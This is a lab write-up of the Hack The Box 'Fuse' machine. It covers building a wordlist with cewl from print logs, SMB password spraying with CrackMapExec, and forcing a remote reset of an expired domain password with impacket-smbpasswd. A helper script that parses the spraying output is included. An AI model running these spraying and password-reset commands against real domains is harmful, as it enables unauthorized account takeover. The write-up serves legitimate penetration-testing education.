Assessment


Up until this point, I have pretty much done EVERYTHING I could think of and could not proceed further.

  • I checked for accounts that do not require Kerberos pre-authentication with impacket-GetNPUsers, and nothing was returned.
  • I also tried brute-forcing passwords for each user with a relatively short password list, and nothing was returned.
  • I checked for other potential web apps by fuzzing, and nothing was returned.

Since the web server has by far the biggest attack surface and the most information available, I will parse it and build a custom wordlist from it for a brute-force attack.

Custom Password List


┌──(kali㉿kali)-[~/archive/htb/labs/fuse]
└─$ cewl http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-number > passwords

The whole idea is to extract credentials that users unintentionally leaked into the print logs, so I scraped the whole web app to build a list of candidate passwords and saved it to the passwords file.

This would almost NEVER work in real life.

Now that I have a list of valid usernames and potential passwords, I will try them all against the SMB server.

Brute-Forcing


┌──(kali㉿kali)-[~/archive/htb/labs/fuse]
└─$ cme smb $IP -u users -p passwords --continue-on-success
smb         10.10.10.193    445    fuse             [*] windows server 2016 standard 14393 x64 (name:FUSE) (domain:fabricorp.local) (signing:True) (SMBv1:True)

[...REDACTED...]

smb         10.10.10.193    445    fuse             [-] fabricorp.local\bnielson:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE 

[...REDACTED...]

I got one hit: bnielson:Fabricorp01

I remember that the bnielson user is supposed to be a new starter.

But the response is a bit strange: it says STATUS_PASSWORD_MUST_CHANGE.

It turns out the box author put a valid password into the name of one of the printed documents, on the theory that someone might name a Word document after his/her password, which is a complete garbage theory. Fabrico01.docx is apparently the document.

Either STATUS_PASSWORD_MUST_CHANGE or STATUS_PASSWORD_EXPIRED means the password itself was correct; the account simply cannot log on until the password is changed.
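To make that distinction concrete, here is an added Python snippet (not part of the original writeup) that triages CrackMapExec-style SMB result lines by their NTSTATUS, separating outright failures from credentials that are correct but blocked by a forced password change. The sample lines and every username other than bnielson are constructed for the example.

```python
import re

# Constructed sample lines in CrackMapExec's SMB output layout (not captured from the box).
SAMPLE_OUTPUT = """\
smb         10.10.10.193    445    fuse             [*] Windows Server 2016 Standard 14393 x64 (name:FUSE) (domain:fabricorp.local) (signing:True) (SMBv1:True)
smb         10.10.10.193    445    fuse             [-] fabricorp.local\\jdoe:Fabricorp01 STATUS_LOGON_FAILURE
smb         10.10.10.193    445    fuse             [-] fabricorp.local\\bnielson:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE
smb         10.10.10.193    445    fuse             [-] fabricorp.local\\asmith:Fabricorp01 STATUS_PASSWORD_EXPIRED
smb         10.10.10.193    445    fuse             [+] fabricorp.local\\mjones:Qwer1234
"""

# NTSTATUS codes that still prove the password was correct even though the logon was refused.
VALID_BUT_BLOCKED = {"STATUS_PASSWORD_MUST_CHANGE", "STATUS_PASSWORD_EXPIRED"}

# [+]/[-] marker, DOMAIN\user:password, and an optional trailing NTSTATUS name.
LINE_RE = re.compile(
    r"\[(?P<mark>[+-])\]\s+(?P<domain>[^\\\s]+)\\(?P<user>[^:\s]+):(?P<password>\S+)"
    r"(?:\s+(?P<status>STATUS_\w+))?"
)


def classify_results(output: str) -> dict:
    """Group each attempted credential by what its result line actually tells us."""
    results = {"valid": [], "valid_but_blocked": [], "invalid": []}
    for line in output.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue  # banner and [*] info lines carry no credential result
        cred = f"{m['user']}:{m['password']}"
        if m["mark"] == "+":
            results["valid"].append(cred)
        elif m["status"] in VALID_BUT_BLOCKED:
            results["valid_but_blocked"].append((cred, m["status"]))
        else:
            results["invalid"].append(cred)
    return results


if __name__ == "__main__":
    for bucket, entries in classify_results(SAMPLE_OUTPUT).items():
        print(f"{bucket}: {entries}")
```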


Upon searching on Google, I found out that it is possible to reset an expired password remotely over an SMB connection.

Remote Password Reset


┌──(kali㉿kali)-[~/archive/htb/labs/fuse]
└─$ impacket-smbpasswd fabricorp.local/bnielson:Fabricorp01@$IP -newpass Qwer1234
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[!] Password is expired, trying to bind with a null session.
[*] Password was changed successfully.

I’ve set the new password for the bnielson user to Qwer1234.

Now that I have a valid domain credential, I can further enumerate the AD environment.

There is likely a script running in the background that expires and resets the bnielson user's password every 40-60 seconds, because I keep getting invalid credential errors, so I will have to keep changing the password as I go along.